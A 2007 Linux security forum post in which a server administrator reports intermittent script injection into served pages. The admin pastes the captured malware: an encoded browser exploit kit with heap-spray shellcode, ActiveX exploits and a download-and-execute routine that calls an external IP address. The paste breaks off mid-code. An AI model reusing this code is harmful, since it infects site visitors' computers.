LinuxQuestions.org
Visit Jeremy's Blog.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 08-04-2007, 05:39 AM   #1
kentsbest
LQ Newbie
 
Registered: Aug 2007
Posts: 3

Rep: Reputation: 0
Dynamic javascript injection - Malware


Hi All,

Architecture overview:

Redhat Enterprise Linux v3 Update 9 server running behind Foundry load balancer. The server has been updated with the latest patches from Redhat. Apache version is 2.0.46. We are also running Coldfusion MX 7 on the server and using PHP to serve dynamic content.

Problem description:

Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, cfm, etc) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below). If anybody wants to see the sniffer traces, please let me know and I can provide download links.

We also saw a post at Bloodhound virus - Web Hosting Forum - Web hosting discussion at SiteGround.com which shows similar problem. Unfortunately the solution (use grsecurity kernel) does not makes any sense and I suspect that it would be a temp solution.

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
3) Have run f-prot - All clean
4) Manually compiled Apache 2.0.59 + PHP 5.2.3 - Problem persists.

Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
unescape ('%0a%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c %64%69%76%20%69%64%3d%22%6d%79%64%69%76%22%3e%3c%2 f%64%69%76%3e%0a%0a%3c%73%63%72%69%70%74%20%6c%61% 6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70 %74%22%3e%0a%0a%76%61%72%20%6d%65%6d%6f%72%79%20%3 d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61% 72%20%6d%65%6d%5f%66%6c%61%67%20%3d%20%30%3b%0a%0a %66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%2 9%20%7b%20%6d%65%6d%6f%72%79%3d%6d%65%6d%6f%72%79% 3b%20%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76 %69%6e%67%28%29%22%2c%20%32%30%30%30%29%3b%20%7d%0 a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72% 61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64 %65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%0a%7b%0a%09%77%68%69%6c%65%20%28%73%70%72%61% 79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73 %70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%09%7 b%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70% 72%61%79%53%6c%69%64%65%3b%7d%0a%0a%09%73%70%72%61 %79%53%6c%69%64%65%20%3d%20%73%70%72%61%
79%53%6c%69%64%65%2e%73%75%62%73%74%72%69%6e%67%28 %30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2 f%32%29%3b%0a%09%72%65%74%75%72%6e%20%73%70%72%61% 79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69 %6f%6e%20%6d%61%6b%65%53%6c%69%64%65%28%29%0a%7b%0 a%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f% 41%64%64%72%65%73%73%20%3d%20%30%78%30%63%30%63%30 %63%30%63%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%6 4%43%6f%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28% 22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66 %65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%3 8%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22% 20%2b%0a%22%25%75%65%32%34%33%25%75%65%62%66%61%25 %75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%6 6%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66% 65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39 %66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%7 5%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62% 22%20%2b%0a%22%25%75%36%34%65%66%25%75%62%39%30%33 %25%75%36%31%38%37%25%75%65%31%61%31%25%
75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66 %25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%3 8%37%25%75%36%35%31%31%25%75%30%37%65%31%25%75%65% 66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75 %62%39%65%37%22%20%2b%0a%22%25%75%63%61%38%37%25%7 5%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64% 25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65 %33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%3 7%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75% 61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25 %75%30%61%39%36%22%20%2b%0a%22%25%75%30%37%35%37%2 5%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36% 36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61 %32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%6 5%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25% 75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61 %25%75%65%65%38%35%22%20%2b%0a%22%25%75%36%34%62%3 6%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66% 36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66 %35%64%39%25%75%39%66%63%30%25%75%37%38%
30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66 %33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%7 5%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25% 75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66 %25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%6 5%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65% 66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75 %32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%2 5%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22% 25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31 %30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%6 5%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75% 61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25 %75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%6 2%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a% 22%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61 %36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%6 2%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25% 75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30 %25%75%36%34%63%66%25%75%65%37%61%61%25%
75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61 %22%20%2b%0a%22%25%75%66%66%30%37%25%75%65%66%65%6 6%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66% 61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66 %37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%7 5%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63% 25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65 %63%22%20%2b%0a%22%25%75%30%33%36%63%25%75%62%35%6 5%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62% 64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75 %36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%2 5%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64% 33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39 %31%63%22%20%2b%0a%22%25%75%39%39%36%34%25%75%65%6 3%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75% 34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25 %75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%3 5%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63% 65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31 %31%64%34%22%20%2b%0a%22%25%75%39%61%62%
31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35 %36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%6 5%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25% 75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34 %25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%6 5%37%25%75%31%62%30%37%22%20%2b%0a%22%25%75%31%30% 31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61 %30%61%32%25%75%65%66%61%31%22%20%2b%20') +
MR2 +
unescape ('%29%3b%0a%09%76%61%72%20%68%65%61%70%42%6c%6f%63 %6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3 b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a% 65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c %65%6e%67%74%68%20%2a%20%32%3b%0a%09%76%61%72%20%7 3%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20% 68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28 %70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%2 9%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64% 65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30 %63%30%63%25%75%30%63%30%63%22%29%3b%0a%0a%09%73%7 0%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70% 72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69 %64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%3b%0a%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d% 20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72 %65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%6 8%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0a%09%0a% 09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42 %6c%6f%63%6b%73%3b%69%2b%2b%29%0a%09%7b%
0a%09%09%6d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70 %72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%6 1%64%43%6f%64%65%3b%0a%09%7d%0a%0a%09%6d%65%6d%5f% 66%6c%61%67%20%3d%20%31%3b%0a%09%68%61%76%69%6e%67 %28%29%3b%0a%09%72%65%74%75%72%6e%20%6d%65%6d%6f%7 2%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73% 74%61%72%74%57%56%46%28%29%0a%7b%0a%09%66%6f%72%20 %28%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0a%0 9%7b%0a%09%09%74%72%79%7b%20%0a%09%09%09%76%61%72% 20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65 %58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%4 6%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65% 77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a %09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%3 0%78%37%66%66%66%66%66%66%65%2c%20%30%78%30%63%30% 63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63 %2c%30%78%30%63%30%63%30%63%30%63%20%29%3b%20%0a%0 9%09%7d%63%61%74%63%68%28%65%29%7b%7d%0a%09%7d%0a% 7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74 %57%69%6e%5a%69%70%28%6f%62%6a%65%63%74%
29%0a%7b%0a%09%76%61%72%20%78%68%20%3d%20%27%41%27 %3b%0a%09%77%68%69%6c%65%20%28%78%68%2e%6c%65%6e%6 7%74%68%20%3c%20%32%33%31%29%20%78%68%2b%3d%27%41% 27%3b%0a%09%78%68%2b%3d%22%5c%78%30%63%5c%78%30%63 %5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%5 c%78%30%63%22%3b%0a%09%6f%62%6a%65%63%74%2e%43%72% 65%61%74%65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d %4e%61%6d%65%28%78%68%29%3b%0a%7d%0a%0a%66%75%6e%6 3%74%69%6f%6e%20%73%74%61%72%74%4f%76%65%72%66%6c% 6f%77%28%6e%75%6d%29%0a%7b%0a%09%69%66%20%28%6e%75 %6d%20%3d%3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7 b%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77% 20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%51 %75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6 d%65%27%29%3b%09%09%0a%09%09%09%69%66%20%28%71%74% 29%20%7b%0a%09%09%09%09%76%61%72%20%71%74%68%74%6d %6c%20%3d%20%27%3c%6f%62%6a%65%63%74%20%43%4c%41%5 3%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32% 35%44%35%2d%38%43%31%37%2d%34%42%32%33%2d%42%43%38 %30%2d%44%33%34%38%38%41%42%44%44%43%36%
42%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67 %68%74%3d%22%31%22%20%73%74%79%6c%65%3d%22%62%6f%7 2%64%65%72%3a%30%70%78%22%3e%27%2b%0a%09%09%09%09% 27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63 %22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%3 6%36%2e%39%36%2e%32%31%38%2e%38%35%2f%64%6f%77%6e% 6c%6f%61%64%2f%31%36%37%32%31%32%2f%6d%6f%76%69%65 %2e%71%74%6c%22%3e%27%2b%0a%09%09%09%09%27%3c%70%6 1%72%61%6d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c% 61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e %27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%6 1%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d% 22%66%61%6c%73%65%22%3e%27%2b%0a%09%09%09%09%27%3c %70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%7 2%6f%6c%6c%65%72%22%20%76%61%6c%75%65%3d%22%74%72% 75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%2f%6f%62%6a %65%63%74%3e%27%3b%0a%09%09%09%09%69%66%20%28%21%2 0%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c% 69%64%65%28%29%3b%0a%09%09%09%09%64%6f%63%75%6d%65 %6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%
42%79%49%64%28%27%6d%79%64%69%76%27%29%2e%69%6e%6e %65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0 a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a%09% 09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20 %7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%20%3d%2 0%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28% 22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29 %22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%2 0%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29% 3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75 %6d%20%3d%3d%20%31%29%20%7b%0a%09%09%74%72%79%20%7 b%0a%09%09%09%76%61%72%20%77%69%6e%7a%69%70%20%3d% 20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45 %6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3 b%0a%09%09%09%77%69%6e%7a%69%70%2e%73%65%74%41%74% 74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22 %2c%20%22%63%6c%73%69%64%3a%41%30%39%41%45%36%38%4 6%2d%42%31%34%44%2d%34%33%45%44%2d%42%37%31%33%2d% 42%41%34%31%33%46%30%33%34%39%30%34%22%29%3b%0a%0a %09%09%09%76%61%72%20%72%65%74%3d%77%69%
6e%7a%69%70%2e%43%72%65%61%74%65%4e%65%77%46%6f%6c %64%65%72%46%72%6f%6d%4e%61%6d%65%28%75%6e%65%73%6 3%61%70%65%28%22%25%30%30%22%29%29%3b%0a%09%09%09% 69%66%20%28%72%65%74%20%3d%3d%20%66%61%6c%73%65%29 %20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5 f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28% 29%3b%0a%09%09%09%09%73%74%61%72%74%57%69%6e%5a%69 %70%28%77%69%6e%7a%69%70%29%3b%0a%09%09%09%09%6e%7 5%6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%0a%09% 09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a %09%09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%2 0%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72% 74%4f%76%65%72%66%6c%6f%77%28%32%29%22%2c%20%32%30 %30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%7 4%4f%76%65%72%66%6c%6f%77%28%32%29%3b%0a%0a%09%7d% 20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20 %32%29%20%7b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%0 9%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63% 74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56 %69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%
2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f %6e%2e%31%27%29%3b%0a%09%09%09%69%66%20%28%74%61%7 2%29%20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65% 6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65 %28%29%3b%0a%09%09%09%09%73%74%61%72%74%57%56%46%2 8%29%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63% 68%28%65%29%20%7b%20%7d%0a%09%7d%0a%7d%0a%0a%0a%66 %75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%7 4%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%09%76%61%72% 20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67 %68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%7 9%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f% 6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b%0a%09%76%61 %72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%2 0%27%27%3b%0a%09%66%6f%72%20%28%76%61%72%20%69%3d% 30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74 %68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76%61%72%20%7 2%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72% 28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%20%2a%20 %63%68%61%72%73%2e%6c%65%6e%67%74%68%29%
3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20 %2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6 e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a% 09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f %6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63%7 4%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74% 28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%09 %76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%7 2%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c% 53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28 %6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%2 9%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20% 74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43 %4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%7 4%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61% 74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21 %20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%2 8%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74% 65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2c %20%22%22%29%27%29%20%7d%63%61%74%63%68%
28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29 %20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%2 0%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63% 74%28%22%22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61 %74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%2 1%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c% 28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62 %6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%2 0%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69% 66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65 %76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%6 5%74%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20% 7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65 %74%75%72%6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%7 4%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c% 6f%61%64%28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a %09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6 e%28%22%47%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c% 73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e %75%6c%6c%29%3b%0a%0a%09%7d%20%63%61%74%
63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b %20%7d%0a%0a%09%72%65%74%75%72%6e%20%78%6d%6c%2e%7 2%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a% 66%75%6e%63%74%69%6f%6e%20%41%44%4f%42%44%53%74%72 %65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%2 0%64%61%74%61%29%20%7b%0a%0a%09%74%72%79%20%7b%0a% 09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f %2e%4d%6f%64%65%20%3d%20%33%3b%0a%09%09%6f%2e%4f%7 0%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28% 64%61%74%61%29%3b%0a%09%09%6f%2e%53%61%76%65%54%6f %46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%0 9%6f%2e%43%6c%6f%73%65%28%29%3b%0a%09%7d%20%63%61% 74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30 %3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%31%3b%0a%7 d%0a%0a%66%75%6e%63%74%69%6f%6e%20%53%68%65%6c%6c% 45%78%65%63%75%74%65%28%65%78%65%63%2c%20%6e%61%6d %65%2c%20%74%79%70%65%29%20%7b%0a%0a%09%69%66%20%2 8%74%79%70%65%20%3d%3d%20%30%29%20%7b%0a%09%09%74% 72%79%20%7b%20%65%78%65%63%2e%52%75%6e%28%6e%61%6d %65%2c%20%30%29%3b%20%72%65%74%75%72%6e%
20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20 %7d%0a%09%7d%20%65%6c%73%65%20%7b%0a%09%09%74%72%7 9%20%7b%20%65%78%65%2e%53%68%65%6c%6c%45%78%65%63% 75%74%65%28%6e%61%6d%65%29%3b%20%72%65%74%75%72%6e %20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%2 0%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%28%30%29% 3b%0a%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%4d%44 %41%43%28%29%20%7b%0a%09%76%61%72%20%74%20%3d%20%6 e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43% 35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33 %41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2 c%20%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33% 2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46 %43%32%39%45%33%36%7d%27%2c%20%27%7b%41%42%39%42%4 3%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33% 32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%7d%27 %2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%3 0%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30% 30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36 %46%30%33%41%2d%30%30%30%30%2d%30%30%30%
30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30 %34%36%7d%27%2c%20%27%7b%36%65%33%32%30%37%30%61%2 d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64% 63%31%66%61%39%31%64%32%66%63%33%7d%27%2c%20%27%7b %36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%3 1%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38% 33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33 %2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%3 3%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27% 7b%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33 %63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%3 0%37%36%36%7d%27%2c%20%27%7b%36%33%39%46%37%32%35% 46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d %38%37%34%38%34%37%36%38%32%30%31%30%7d%27%2c%20%2 7%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34% 34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38 %34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%3 5%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30% 2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20 %27%7b%45%38%43%43%43%44%44%46%2d%43%41%
32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37 %43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c%2 9%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41% 72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%20 %6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%3 0%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76% 61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20 %75%72%6c%52%65%61%6c%45%78%65%20%3d%20') +
MU2 +
